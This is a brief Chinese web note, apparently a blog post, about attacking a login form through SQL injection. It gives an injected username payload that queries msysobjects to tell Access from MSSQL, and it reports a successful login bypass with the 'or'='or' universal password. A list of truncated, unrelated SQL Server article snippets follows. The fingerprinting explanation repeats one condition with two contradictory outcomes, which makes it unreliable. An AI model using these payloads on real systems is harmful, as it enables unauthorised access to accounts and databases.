判断Access与mssql数据库

构造payload:

username=123123'+and+(select+count(*)+from+msysobjects)>0+and+'a'='a--

通过and (select count(*)+from msysobjects)>0 进行判断

and (select count(*)+from msysobjects)>0 :返回权限不足为Access数据库
and (select count(*)+from msysobjects)>0 :返回正常则为MSsql数据库

通过sql注入漏洞,使用万能密码(‘or’=’or’)成功登陆

相关文章

SELECT a.*,b.dp_name,c.pa_name,fm_name=(CASE WHEN a.fm_n...
if not exists(select name from syscolumns where name=&am...
select a.*,pano=a.pa_no,b.pa_name,f.dp_name,e.fw_state_n...
要在 SQL Server 2019 中设置定时自动重启,可以使用 Window...
您收到的错误消息表明数据库 'EastRiver' 的...
首先我需要查询出需要使用SQL Server Profiler跟踪的数据库标...